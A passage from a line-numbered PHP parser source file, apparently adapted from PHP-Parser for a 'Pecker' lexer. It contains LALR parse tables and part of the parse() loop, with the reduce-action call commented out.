142, 142, 71, 142, 142, 145, 75, 143, 540 | 143, 78, 79, 80, 143, 82, 143, 84, 143, 86, 541 | 143, 143, 89, 142, 143, 143, 93, 94, 95, 143, 542 | 65, 98, 99, 143, 143, 102, 71, 144, 105, 106, 543 | 75, 144, 144, 78, 79, 80, 113, 82, 144, 84, 544 | 144, 86, 144, 144, 89, 42, 43, 144, 93, 94, 545 | 95, 144, 144, 98, 99, 144, 144, 102, 144, 144, 546 | 105, 106, 145, 145, 61, 142, 143, 145, 113, 145, 547 | 145, 145, 69, 70, 145, 65, 73, 145, 145, 145, 548 | 77, 71, 145, 145, 145, 75, 145, 145, 78, 79, 549 | 80, 145, 82, 145, 84, 145, 86, 142, 143, 89, 550 | 146, 146, 146, 93, 94, 95, 146, 146, 98, 99, 551 | 146, 146, 102, 146, 146, 105, 106, 146, 146, 146, 552 | 146, 146, 146, 113, 146, 146, 146, 146, 125, 146, 553 | 127, 128, 129, 130, 131, 132, 133, 148, -1, 149, 554 | 149, 149, 139, 140, 96, 97, 149, 149, 145, 96, 555 | 147, 103, 142, 143, 149, 107, 108, 8, 9, 10, 556 | 107, 108, 149, 149, 116, 117, 118, 119, 149, 116, 557 | 117, 118, 119, 96, 25, 149, 27, 28, 29, 30, 558 | 31, 149, 149, 149, 107, 108, 138, 96, 149, -1, 559 | -1, 96, 144, 116, 117, 118, 119, 144, 107, 108, 560 | -1, -1, 107, 108, 96, -1, -1, 116, 117, 118, 561 | 119, 116, 117, 118, 119, 107, 108, -1, -1, -1, 562 | 96, 144, -1, -1, 116, 117, 118, 119, -1, -1, 563 | -1, 107, 108, 96, -1, 144, -1, 96, 83, 144, 564 | 116, 117, 118, 119, 107, 108, -1, -1, 107, 108, 565 | -1, 96, 144, 116, 117, 118, 119, 116, 117, 118, 566 | 119, -1, 107, 108, 85, -1, -1, -1, 144, -1, 567 | 87, 116, 117, 118, 119, 96, -1, -1, -1, 96, 568 | -1, 144, -1, -1, -1, 144, 107, 108, -1, -1, 569 | 107, 108, 8, 9, 10, 116, 117, 118, 119, 116, 570 | 117, 118, 119, -1, 96, -1, -1, -1, -1, 25, 571 | -1, 27, 28, 29, 30, 107, 108, -1, -1, -1, 572 | -1, -1, -1, -1, 116, 117, 118, 119 573 | ); 574 | 575 | protected static $yybase = array( 576 | 0, 728, 294, 110, 817, 804, 2, 863, 859, 733, 577 | 821, 788, 771, 835, 775, 757, 888, 888, 888, 888, 578 | 888, 368, 377, 391, 394, 391, 410, -2, -2, -2, 579 | 435, 244, 244, 635, 244, 276, 603, 467, 519, 383, 580 | 351, 160, 192, 551, 551, 551, 551, 690, 690, 551, 581 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 582 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 583 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 584 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 585 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 586 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 587 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 588 | 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 589 | 551, 551, 158, 429, 468, 470, 527, 528, 529, 530, 590 | 450, 456, 634, 587, 583, 413, 579, 578, 576, 574, 591 | 568, 588, 567, 670, 563, 124, 124, 124, 124, 124, 592 | 124, 124, 124, 124, 124, 225, 371, 206, 206, 206, 593 | 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 594 | 206, 206, 178, 178, 80, 683, 683, 683, 683, 683, 595 | 683, 683, 683, 683, 683, 683, -3, 396, 964, 829, 596 | 167, 167, 167, 167, 13, -25, -25, -25, -25, 148, 597 | 108, 209, 113, 113, 446, 446, 422, 547, 163, 163, 598 | 163, 163, 163, 163, 163, 163, 163, 163, 449, 415, 599 | 240, 240, 614, 614, 64, 64, 64, 64, 302, -33, 600 | -55, 235, -1, 256, 451, 137, 137, 137, 459, 440, 601 | 460, 193, 271, 271, 271, -24, -24, -24, -24, 545, 602 | -24, -24, -24, 188, 216, -50, -50, -29, 205, 464, 603 | 594, 462, 591, 299, 482, -41, 317, 442, 226, 454, 604 | 442, 326, 332, 314, 458, 89, 226, 158, 197, 309, 605 | 218, 425, 428, 531, 395, 67, 99, 32, -23, 182, 606 | 146, 143, 402, 640, 636, 186, 151, 465, 101, -10, 607 | 182, 221, 534, 88, 1, 533, 242, 365, 598, 436, 608 | 618, 438, 436, 445, 365, 613, 613, 613, 613, 365, 609 | 432, 618, 618, 365, 422, 618, 254, 432, 365, 444, 610 | 432, 448, 613, 523, 521, 436, 439, 418, 618, 618, 611 | 618, 438, 365, 613, 452, 243, 618, 613, 452, 365, 612 | 445, 185, 417, 348, 605, 630, 602, 434, 560, 441, 613 | 406, 621, 619, 628, 437, 430, 622, 597, 495, 518, 614 | 431, 375, 407, 414, 419, 497, 412, 466, 454, 498, 615 | 315, 457, 491, 457, 719, 486, 474, 453, 463, 517, 616 | 370, 353, 536, 495, 648, 656, 669, 433, 532, 653, 617 | 457, 714, 525, 338, 355, 617, 427, 457, 612, 457, 618 | 537, 457, 647, 426, 592, 495, 315, 315, 315, 645, 619 | 713, 712, 706, 699, 694, 693, 685, 409, 678, 516, 620 | 655, 65, 626, 458, 490, 424, 513, 214, 677, 457, 621 | 457, 541, 545, 457, 512, 524, 661, 510, 652, 447, 622 | 469, 672, 440, 654, 457, 461, 671, 214, 408, 403, 623 | 641, 509, 543, 604, 548, 359, 644, 606, 552, 363, 624 | 595, 421, 506, 660, 659, 663, 505, 556, 420, 401, 625 | 443, 609, 501, 651, 423, 483, 455, 404, 561, 416, 626 | 658, 500, 499, 496, 0, 0, 0, 0, 0, 0, 627 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 628 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 629 | 0, 0, -2, -2, -2, -2, -2, -2, -2, -2, 630 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 631 | -2, -2, -2, -2, -2, -2, -2, -2, 0, 0, 632 | 0, -2, -2, -2, -2, -2, -2, -2, -2, -2, 633 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 634 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 635 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 636 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 637 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 638 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 639 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 640 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 641 | -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 642 | -2, -2, -2, 124, 124, 124, 124, 124, 124, 124, 643 | 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 644 | 124, 124, 124, 124, 124, 124, 0, 0, 0, 0, 645 | 0, 0, 0, 0, 0, 0, 124, 124, 124, 124, 646 | 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 647 | 124, 124, 124, 124, 124, 124, 163, 163, 163, 163, 648 | 163, 163, 163, 163, 163, 163, 163, 124, 124, 124, 649 | 124, 124, 124, 124, 124, 0, 271, 271, 271, 271, 650 | 72, 72, 72, 163, 163, 163, 163, 163, 163, 0, 651 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 652 | 72, 271, 271, 163, 163, -24, -24, -24, -24, -24, 653 | -50, -50, -50, 146, -24, -50, 149, 149, 149, -50, 654 | -50, -50, 146, 0, 0, 0, 0, 0, 0, 0, 655 | 149, 0, 0, 0, 432, 618, 0, 0, 0, 149, 656 | 316, 316, 316, 316, 214, 182, 0, 495, 432, 0, 657 | 439, 432, 0, 0, 0, 618, 0, 0, 0, 0, 658 | 0, 0, 338, 532, 333, 495, 0, 0, 0, 0, 659 | 0, 0, 0, 495, 217, 217, 0, 0, 409, 0, 660 | 0, 0, 0, 333, 0, 0, 214 661 | ); 662 | 663 | protected static $yydefault = array( 664 | 3,32767,32767, 1,32767,32767,32767,32767,32767,32767, 665 | 32767,32767,32767,32767,32767,32767, 106, 98, 112, 97, 666 | 108,32767,32767,32767,32767,32767,32767,32767,32767,32767, 667 | 32767, 377, 377,32767, 334,32767,32767,32767,32767,32767, 668 | 32767,32767,32767, 179, 179, 179,32767,32767,32767, 366, 669 | 366, 366, 366, 366, 366, 366, 366, 366, 366,32767, 670 | 32767,32767,32767,32767, 257,32767,32767,32767,32767,32767, 671 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 672 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 673 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 674 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 675 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 676 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 677 | 32767,32767,32767,32767, 262, 382,32767,32767,32767,32767, 678 | 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 679 | 32767,32767,32767,32767,32767, 238, 239, 241, 242, 178, 680 | 367, 131, 263, 381, 177, 205, 207, 256, 206, 183, 681 | 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 682 | 198, 182, 235, 234, 203, 331, 331, 334,32767,32767, 683 | 32767,32767,32767,32767,32767,32767, 204, 208, 210, 209, 684 | 225, 226, 223, 224, 181, 227, 228, 229, 230, 163, 685 | 163, 163,32767,32767, 376, 376,32767,32767,32767,32767, 686 | 32767,32767,32767,32767,32767,32767,32767,32767, 164,32767, 687 | 217, 218, 292, 292, 122, 122, 122, 122, 122,32767, 688 | 32767,32767,32767,32767, 300,32767,32767,32767,32767,32767, 689 | 302,32767, 212, 213, 211,32767,32767,32767,32767,32767, 690 | 32767,32767,32767,32767, 339, 301,32767,32767,32767,32767, 691 | 32767,32767,32767,32767, 352, 288,32767,32767,32767, 281, 692 | 32767, 109, 111, 61, 318,32767,32767,32767,32767,32767, 693 | 357,32767,32767,32767, 17,32767,32767,32767, 389, 352, 694 | 32767,32767, 19,32767,32767,32767,32767, 233,32767,32767, 695 | 356, 350,32767,32767,32767,32767,32767, 65, 297,32767, 696 | 303,32767,32767,32767, 65,32767,32767,32767,32767, 65, 697 | 32767, 355, 354, 65,32767, 282, 333,32767, 65, 76, 698 | 32767, 74,32767, 95, 95,32767,32767, 78, 329, 345, 699 | 32767,32767, 65,32767, 270, 333,32767,32767, 270, 65, 700 | 32767,32767, 4, 307,32767,32767,32767,32767,32767,32767, 701 | 32767,32767,32767,32767,32767,32767,32767,32767, 283,32767, 702 | 32767,32767, 253, 254, 341,32767, 342,32767, 281,32767, 703 | 221, 200,32767, 202,32767,32767, 286, 289,32767,32767, 704 | 32767, 140,32767, 284,32767, 186,32767,32767,32767,32767, 705 | 384,32767,32767, 180,32767,32767,32767, 136,32767, 63, 706 | 32767, 374,32767,32767, 350, 285, 214, 215, 216,32767, 707 | 32767,32767,32767,32767,32767,32767,32767, 351,32767,32767, 708 | 32767, 116,32767, 318,32767,32767,32767, 77,32767, 184, 709 | 132,32767,32767, 383,32767,32767,32767,32767,32767,32767, 710 | 338,32767,32767,32767, 64,32767,32767, 79,32767,32767, 711 | 350,32767,32767,32767,32767, 120,32767,32767,32767, 175, 712 | 32767,32767,32767,32767,32767, 350,32767,32767,32767,32767, 713 | 32767,32767,32767,32767, 4,32767, 157,32767,32767,32767, 714 | 32767,32767,32767,32767, 25, 25, 3, 25, 103, 25, 715 | 143, 3, 95, 95, 58, 143, 25, 143, 25, 25, 716 | 25, 25, 25, 25, 25, 150, 25, 25, 25, 25, 717 | 25 718 | ); 719 | 720 | protected static $yygoto = array( 721 | 161, 135, 135, 140, 135, 161, 136, 137, 138, 143, 722 | 145, 169, 163, 159, 159, 159, 159, 140, 140, 160, 723 | 160, 160, 160, 160, 160, 160, 160, 160, 160, 155, 724 | 156, 157, 158, 167, 134, 750, 751, 390, 753, 774, 725 | 775, 776, 777, 778, 779, 780, 782, 718, 139, 141, 726 | 142, 144, 165, 166, 168, 184, 196, 197, 198, 199, 727 | 200, 201, 202, 203, 205, 206, 207, 208, 230, 231, 728 | 252, 253, 254, 426, 427, 428, 170, 171, 172, 173, 729 | 174, 175, 176, 177, 178, 179, 180, 181, 146, 147, 730 | 148, 162, 149, 164, 150, 182, 151, 152, 153, 183, 731 | 154, 132, 443, 443, 443, 443, 443, 443, 443, 443, 732 | 443, 443, 443, 311, 485, 421, 421, 449, 417, 419, 733 | 419, 391, 393, 410, 424, 450, 453, 464, 470, 335, 734 | 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 735 | 335, 335, 335, 335, 335, 646, 646, 906, 906, 813, 736 | 813, 654, 654, 654, 654, 654, 405, 538, 538, 538, 737 | 495, 444, 444, 444, 444, 444, 444, 444, 444, 444, 738 | 444, 444, 611, 611, 611, 611, 270, 606, 612, 490, 739 | 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 740 | 392, 392, 392, 392, 392, 392, 539, 539, 539, 582, 741 | 395, 395, 5, 878, 16, 210, 6, 211, 396, 396, 742 | 537, 537, 537, 7, 422, 17, 18, 8, 19, 9, 743 | 10, 11, 910, 20, 12, 13, 14, 15, 455, 483, 744 | 632, 617, 615, 613, 615, 508, 398, 641, 636, 850, 745 | 850, 850, 850, 850, 850, 850, 850, 850, 850, 850, 746 | 430, 431, 432, 433, 434, 435, 436, 438, 466, 835, 747 | 458, 463, 500, 467, 273, 315, 830, 1, 697, 316, 748 | 809, 810, 2, 771, 26, 21, 285, 554, 672, 621, 749 | 852, 853, 868, 652, 707, 276, 661, 807, 877, 807, 750 | 439, 291, 250, 885, 885, 808, 241, 886, 886, 294, 751 | 476, 29, 294, 916, 916, 481, 901, 901, 901, 866, 752 | 292, 484, 919, 916, 408, 903, 299, 299, 299, 418, 753 | 884, 304, 397, 397, 429, 716, 762, 404, 919, 919, 754 | 299, 825, 824, 459, 650, 546, 664, 851, 518, 310, 755 | 488, 404, 404, 312, 271, 272, 552, 804, 669, 620, 756 | 863, 487, 403, 0, 705, 0, 0, 0, 0, 302, 757 | 0, 0, 425, 0, 0, 0, 0, 0, 0, 0, 758 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 759 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 760 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 761 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 762 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 763 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 764 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 765 | 0, 0, 0, 409 766 | ); 767 | 768 | protected static $yygcheck = array( 769 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 770 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 771 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 772 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 773 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 774 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 775 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 776 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 777 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 778 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 779 | 24, 24, 38, 38, 38, 38, 38, 38, 38, 38, 780 | 38, 38, 38, 32, 32, 32, 32, 32, 32, 32, 781 | 32, 32, 32, 32, 32, 32, 32, 32, 32, 38, 782 | 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 783 | 38, 38, 38, 38, 38, 53, 53, 53, 53, 38, 784 | 38, 38, 38, 38, 38, 38, 75, 6, 6, 6, 785 | 38, 92, 92, 92, 92, 92, 92, 92, 92, 92, 786 | 92, 92, 38, 38, 38, 38, 48, 38, 38, 38, 787 | 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 788 | 89, 89, 89, 89, 89, 89, 7, 7, 7, 31, 789 | 89, 89, 13, 57, 13, 44, 13, 44, 92, 92, 790 | 5, 5, 5, 13, 83, 13, 13, 13, 13, 13, 791 | 13, 13, 112, 13, 13, 13, 13, 13, 21, 21, 792 | 5, 5, 5, 5, 5, 5, 5, 5, 5, 99, 793 | 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 794 | 84, 84, 84, 84, 84, 84, 84, 84, 84, 57, 795 | 40, 40, 40, 46, 46, 46, 15, 2, 72, 72, 796 | 57, 57, 2, 15, 15, 15, 15, 12, 12, 12, 797 | 12, 12, 12, 12, 12, 4, 59, 57, 57, 57, 798 | 15, 28, 98, 91, 91, 57, 98, 90, 90, 4, 799 | 101, 15, 4, 113, 113, 15, 91, 91, 91, 104, 800 | 39, 30, 113, 113, 39, 110, 96, 96, 96, 39, 801 | 91, 29, 95, 95, 25, 75, 76, 25, 113, 113, 802 | 96, 97, 97, 39, 55, 10, 60, 100, 50, 96, 803 | 39, 25, 25, 9, 48, 48, 11, 87, 61, 47, 804 | 103, 82, 4, -1, 74, -1, -1, -1, -1, 4, 805 | -1, -1, 4, -1, -1, -1, -1, -1, -1, -1, 806 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 807 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 808 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 809 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 810 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 811 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 812 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 813 | -1, -1, -1, 75 814 | ); 815 | 816 | protected static $yygbase = array( 817 | 0, 0, -239, 0, 22, 209, 156, 195, 0, 21, 818 | 55, 1, 89, -303, 0, -52, 0, 0, 0, 0, 819 | 0, 184, 0, 0, -30, 294, 0, 0, 245, 102, 820 | 98, 174, -99, 0, 0, 0, 0, 0, -83, -19, 821 | 25, 0, 0, 0, -310, 0, 7, -2, -168, 0, 822 | 51, 0, 0, -67, 0, 96, 0, -61, 0, 251, 823 | 50, 2, 0, 0, 0, 0, 0, 0, 0, 0, 824 | 0, 0, 40, 0, -6, 109, 93, 0, 0, 0, 825 | 0, 0, -7, 182, 200, 0, 0, 23, 0, -32, 826 | 65, 61, -24, 0, 0, 90, 71, 85, 48, 54, 827 | 49, 114, 0, -5, 122, 0, 0, 0, 0, 0, 828 | 100, 0, 188, 63, 0 829 | ); 830 | 831 | protected static $yygdefault = array( 832 | -32768, 361, 3, 533, 378, 557, 558, 559, 295, 293, 833 | 547, 553, 460, 4, 555, 763, 281, 562, 282, 469, 834 | 564, 412, 566, 567, 133, 379, 296, 297, 413, 303, 835 | 456, 581, 204, 301, 583, 283, 585, 590, 284, 489, 836 | 440, 380, 347, 451, 209, 420, 447, 619, 269, 627, 837 | 521, 635, 638, 381, 441, 649, 352, 806, 308, 660, 838 | 665, 670, 673, 323, 313, 465, 677, 678, 243, 682, 839 | 496, 497, 696, 228, 704, 717, 320, 781, 783, 382, 840 | 383, 406, 474, 394, 411, 800, 314, 803, 384, 385, 841 | 331, 332, 821, 818, 275, 871, 274, 349, 240, 856, 842 | 857, 461, 355, 909, 867, 264, 386, 387, 290, 305, 843 | 904, 336, 911, 918, 448 844 | ); 845 | 846 | protected static $yylhs = array( 847 | 0, 1, 2, 2, 4, 4, 3, 3, 3, 3, 848 | 3, 3, 3, 3, 3, 8, 8, 10, 10, 10, 849 | 10, 9, 9, 11, 13, 13, 14, 14, 14, 14, 850 | 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 851 | 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 852 | 5, 5, 5, 5, 5, 5, 5, 5, 35, 35, 853 | 37, 36, 36, 29, 29, 39, 39, 6, 7, 7, 854 | 7, 41, 41, 41, 42, 42, 45, 45, 43, 43, 855 | 46, 46, 22, 22, 31, 31, 34, 34, 33, 33, 856 | 47, 23, 23, 23, 23, 48, 48, 49, 49, 50, 857 | 50, 20, 20, 16, 16, 51, 18, 18, 52, 17, 858 | 17, 19, 19, 30, 30, 30, 40, 40, 54, 54, 859 | 55, 55, 56, 56, 56, 56, 57, 57, 57, 58, 860 | 58, 59, 59, 26, 26, 60, 60, 60, 27, 27, 861 | 61, 61, 44, 44, 62, 62, 62, 62, 67, 67, 862 | 68, 68, 69, 69, 69, 69, 70, 71, 71, 66, 863 | 66, 63, 63, 65, 65, 73, 73, 72, 72, 72, 864 | 72, 72, 72, 64, 64, 74, 74, 28, 28, 21, 865 | 21, 24, 24, 24, 24, 24, 24, 24, 24, 24, 866 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 867 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 868 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 869 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 870 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 871 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 872 | 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 873 | 15, 15, 25, 25, 79, 79, 80, 80, 80, 75, 874 | 82, 82, 86, 86, 87, 88, 88, 88, 88, 88, 875 | 88, 92, 92, 38, 38, 38, 76, 76, 93, 93, 876 | 89, 89, 94, 94, 94, 94, 94, 77, 77, 77, 877 | 81, 81, 81, 85, 85, 99, 99, 99, 99, 99, 878 | 99, 99, 99, 99, 99, 99, 99, 99, 99, 12, 879 | 12, 12, 12, 12, 12, 78, 78, 78, 78, 100, 880 | 100, 101, 101, 103, 103, 102, 102, 104, 104, 32, 881 | 32, 32, 32, 106, 106, 105, 105, 105, 105, 105, 882 | 107, 107, 91, 91, 95, 95, 90, 90, 108, 108, 883 | 108, 108, 96, 96, 96, 96, 84, 84, 97, 97, 884 | 97, 53, 109, 109, 110, 110, 110, 83, 83, 111, 885 | 111, 112, 112, 112, 112, 98, 98, 98, 98, 113, 886 | 113, 113, 113, 113, 113, 113, 114, 114, 114 887 | ); 888 | 889 | protected static $yylen = array( 890 | 1, 1, 2, 0, 1, 3, 1, 1, 1, 1, 891 | 3, 5, 4, 3, 3, 3, 1, 1, 3, 2, 892 | 4, 3, 1, 3, 2, 0, 1, 1, 1, 1, 893 | 3, 5, 8, 3, 5, 9, 3, 2, 3, 2, 894 | 3, 2, 3, 2, 3, 3, 3, 1, 2, 5, 895 | 7, 9, 5, 1, 6, 3, 3, 2, 0, 2, 896 | 8, 0, 4, 1, 3, 0, 1, 9, 7, 6, 897 | 5, 1, 2, 2, 0, 2, 0, 2, 0, 2, 898 | 1, 3, 1, 4, 1, 4, 1, 4, 1, 3, 899 | 3, 3, 4, 4, 5, 0, 2, 4, 3, 1, 900 | 1, 1, 4, 0, 2, 3, 0, 2, 4, 0, 901 | 2, 0, 3, 1, 2, 1, 1, 0, 1, 3, 902 | 3, 5, 0, 1, 1, 1, 2, 3, 3, 1, 903 | 3, 1, 2, 3, 1, 1, 2, 4, 3, 1, 904 | 1, 3, 2, 0, 3, 3, 8, 3, 1, 3, 905 | 0, 2, 4, 5, 4, 4, 3, 1, 1, 1, 906 | 3, 1, 1, 0, 1, 1, 2, 1, 1, 1, 907 | 1, 1, 1, 1, 3, 1, 3, 3, 1, 0, 908 | 1, 1, 3, 3, 4, 4, 1, 2, 3, 3, 909 | 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 910 | 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 911 | 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 912 | 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 913 | 3, 3, 1, 3, 5, 4, 4, 4, 2, 2, 914 | 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 915 | 2, 2, 1, 1, 1, 3, 2, 1, 9, 10, 916 | 3, 3, 2, 4, 4, 3, 4, 4, 4, 3, 917 | 0, 4, 1, 3, 2, 2, 4, 6, 2, 2, 918 | 4, 1, 1, 1, 2, 3, 1, 1, 1, 1, 919 | 1, 1, 0, 3, 3, 4, 4, 0, 2, 1, 920 | 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 921 | 1, 1, 1, 1, 1, 1, 3, 2, 1, 1, 922 | 3, 2, 2, 4, 3, 1, 3, 3, 3, 1, 923 | 1, 0, 2, 0, 1, 3, 1, 3, 1, 1, 924 | 1, 1, 1, 6, 4, 3, 4, 2, 4, 4, 925 | 1, 3, 1, 2, 1, 1, 4, 1, 3, 6, 926 | 4, 4, 4, 4, 1, 4, 0, 1, 1, 3, 927 | 1, 4, 3, 1, 1, 1, 0, 0, 2, 3, 928 | 1, 3, 1, 4, 2, 2, 2, 1, 2, 1, 929 | 4, 3, 3, 3, 6, 3, 1, 1, 1 930 | ); 931 | 932 | protected $yyval; 933 | protected $yyastk; 934 | protected $stackPos; 935 | protected $lexer; 936 | protected $errMsg; 937 | private $tokens; 938 | private $tokensSkip = array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_ENCAPSED_AND_WHITESPACE); 939 | private $tokensVariable = array('{','}'); 940 | 941 | /** 942 | * Creates a parser instance. 943 | * 944 | * @param PHPParser_Lexer $lexer A lexer 945 | */ 946 | public function __construct(Pecker_Lexer $lexer) { 947 | $this->lexer = $lexer; 948 | $this->tokens = array(); 949 | } 950 | 951 | /** 952 | * Parses PHP code into a node tree. 953 | * 954 | * @param string $code The source code to parse 955 | * 956 | * @return PHPParser_Node[] Array of statements 957 | */ 958 | public function parse($code) { 959 | $bLexed = $this->lexer->startLexing($code); 960 | 961 | // We start off with no lookahead-token 962 | $tokenId = self::TOKEN_NONE; 963 | if (!$bLexed) { 964 | $this->errMsg = $this->lexer->getError(); 965 | return false; 966 | } 967 | 968 | // The attributes for a node are taken from the first and last token of the node. 969 | // From the first token only the startAttributes are taken and from the last only 970 | // the endAttributes. Both are merged using the array union operator (+). 971 | $startAttributes = array('startLine' => 1); 972 | $endAttributes = array(); 973 | 974 | // In order to figure out the attributes for the starting token, we have to keep 975 | // them in a stack 976 | $attributeStack = array($startAttributes); 977 | 978 | // Start off in the initial state and keep a stack of previous states 979 | $state = 0; 980 | $stateStack = array($state); 981 | 982 | // AST stack (?) 983 | $this->yyastk = array(); 984 | 985 | // Current position in the stack(s) 986 | $this->stackPos = 0; 987 | $this->tokens = $this->lexer->getTokens(); 988 | for (;;) { 989 | if (self::$yybase[$state] == 0) { 990 | $yyn = self::$yydefault[$state]; 991 | } else { 992 | if ($tokenId === self::TOKEN_NONE) { 993 | // Fetch the next token id from the lexer and fetch additional info by-ref. 994 | // The end attributes are fetched into a temporary variable and only set once the token is really 995 | // shifted (not during read). Otherwise you would sometimes get off-by-one errors, when a rule is 996 | // reduced after a token was read but not yet shifted. 997 | $origTokenId = $this->lexer->getNextToken($tokenValue, $startAttributes, $nextEndAttributes); 998 | 999 | // map the lexer token id to the internally used token id's 1000 | $tokenId = $origTokenId >= 0 && $origTokenId < self::TOKEN_MAP_SIZE 1001 | ? self::$translate[$origTokenId] 1002 | : self::TOKEN_INVALID; 1003 | 1004 | if ($tokenId === self::TOKEN_INVALID) { 1005 | $this->errMsg = sprintf('The lexer returned an invalid token (id=%d, value=%s)',$origTokenId, $tokenValue); 1006 | return false; 1007 | } 1008 | 1009 | $attributeStack[$this->stackPos] = $startAttributes; 1010 | } 1011 | 1012 | if ((($yyn = self::$yybase[$state] + $tokenId) >= 0 1013 | && $yyn < self::YYLAST && self::$yycheck[$yyn] == $tokenId 1014 | || ($state < self::YY2TBLSTATE 1015 | && ($yyn = self::$yybase[$state + self::YYNLSTATES] + $tokenId) >= 0 1016 | && $yyn < self::YYLAST 1017 | && self::$yycheck[$yyn] == $tokenId)) 1018 | && ($yyn = self::$yyaction[$yyn]) != self::YYDEFAULT) { 1019 | /* 1020 | * >= YYNLSTATE: shift and reduce 1021 | * > 0: shift 1022 | * = 0: accept 1023 | * < 0: reduce 1024 | * = -YYUNEXPECTED: error 1025 | */ 1026 | if ($yyn > 0) { 1027 | /* shift */ 1028 | ++$this->stackPos; 1029 | 1030 | $stateStack[$this->stackPos] = $state = $yyn; 1031 | $this->yyastk[$this->stackPos] = $tokenValue; 1032 | $attributeStack[$this->stackPos] = $startAttributes; 1033 | $endAttributes = $nextEndAttributes; 1034 | $tokenId = self::TOKEN_NONE; 1035 | 1036 | if ($yyn < self::YYNLSTATES) 1037 | continue; 1038 | 1039 | /* $yyn >= YYNLSTATES means shift-and-reduce */ 1040 | $yyn -= self::YYNLSTATES; 1041 | } else { 1042 | $yyn = -$yyn; 1043 | } 1044 | } else { 1045 | $yyn = self::$yydefault[$state]; 1046 | } 1047 | } 1048 | 1049 | for (;;) { 1050 | /* reduce/error */ 1051 | if ($yyn == 0) { 1052 | /* accept */ 1053 | return true; 1054 | } elseif ($yyn != self::YYUNEXPECTED) { 1055 | /* reduce 1056 | try { 1057 | $this->{'yyn' . $yyn}( 1058 | $attributeStack[$this->stackPos - self::$yylen[$yyn]] 1059 | + $endAttributes 1060 | ); 1061 | } catch (PHPParser_Error $e) { 1062 | if (-1 === $e->getRawLine()) { 1063 | $e->setRawLine($startAttributes['startLine']); 1064 | } 1065 | 1066 | throw $e; 1067 | } 1068 | */ 1069 | /* Goto - shift nonterminal */ 1070 | $this->stackPos -= self::$yylen[$yyn]; 1071 | $yyn = self::$yylhs[$yyn]; 1072 | if (($yyp = self::$yygbase[$yyn] + $stateStack[$this->stackPos]) >= 0 1073 | && $yyp < self::YYGLAST 1074 | && self::$yygcheck[$yyp] == $yyn) { 1075 